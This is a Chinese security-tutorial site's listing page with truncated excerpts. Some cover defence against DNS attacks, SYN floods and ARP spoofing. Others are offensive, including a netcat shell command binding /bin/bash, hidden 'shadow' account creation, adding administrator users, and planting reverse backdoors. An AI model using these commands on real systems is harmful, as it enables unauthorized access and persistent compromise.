小编 安全教程 如何从运营角度保障DNS安全 众所周知,DNS作为一项互联网基础业务,对整个互联网的正常运行起着至关重要的作用。当然,别有用心的攻击者也同样明白这个道理,总是希望通过各种各样的攻击手段破坏DNS解析服务的正常开展。 如何从不同层面综合运营,保证DNS服务安全高效的运行,一直以来都是...
小编 安全教程 DNS欺骗的原理 DNS防御实战演练 1.1 域名系统(Domain Name System) DNS即Domain Name System 的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来解析域名的。有了DNS我们就不用再记住...
小编 安全教程 嗅探中当机的一点点启示(有问题就重启机器) 很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊….. 当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗. 这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好...
小编 安全教程 SYN Flood攻击与防御方法 一、为什么Syn Flood会造成危害 这要从操作系统的TCP/IP协议栈的实现说起。当开放了一个TCP端口后,该端口就处于Listening状态,不停地监视发到该端口的Syn报文,一旦接收到Client发来的Syn报文,就需要为该请求分配一个TCB(...
小编 安全教程 什么样的密码难破解最安全?表情符号成最安全的密码 互联网生活促成了庞大的账户密码数据,怎样设置自己登陆密码最安全?什么样的密码难破解?据媒体报道表情符号将成最安全的密码。 什么样的密码难破解最安全?表情符号成最安全的密码 来自英国的安全软件开发公司Intelligent Environments6月1...
小编 安全教程 黑客基础知识 常用命令和快捷键大全 *net user 查看用户列表 *net user 用户名 密码 /add 添加用户 *net user 用户名 密码 更改用户密码 *net localgroup administrators 用户名 /add 添加用户到管理组 *net ...
小编 安全教程 高效的DDoS攻击探测与分析工具:FastNetMon 关于FastNetMon 这是一个基于多种抓包引擎(NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP)的DoS/DDoS攻击高效分析工具,可以探测和分析网络中的异常流量情况,同时可以通过外部脚本通知或阻断攻击。 ...
小编 安全教程 神秘的影子帐号揭秘 影子帐号: 见名思义,帐号具有隐蔽性,不容易被发现(只是在一定程度上)。即一般的菜鸟发现不了。 多余的话我在这里就不说了,进入正题: 首先,我们需要在命令提示符窗口即就是dos下创建一个用户。 需要以下命令: net user $a 123 /add(...
小编 安全教程 Unix系统NC反弹shell的方法 NC的原生做法: nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /tmp/backpipe p然后管道一边接入shell...
小编 安全教程 ARP病毒查找与防范简易教程 一、首先诊断是否为ARP病毒攻击 1、当发现上网明显变慢,或者突然掉线时,我们可以用arp-命令来检查ARP表:(点击“开始”按钮-选择“运行”-输入“cmd”点击"确定...
小编 安全教程 web,sql分离的一点想法 例子: 1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门. 2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer fin...
小编 安全教程 利用php+socket5代理进行内网渗透测试 我用到的工具是phpsocks和大家经常翻墙用的goagent,两款软件相对比,各有优势,phpsocks需要连接数据库,不过这个问题可以通过自 己修改下他的PHP脚本和java客户端即可解决,昨天想改一下这个程序,然后被各种事情打断没时间弄,等有时间...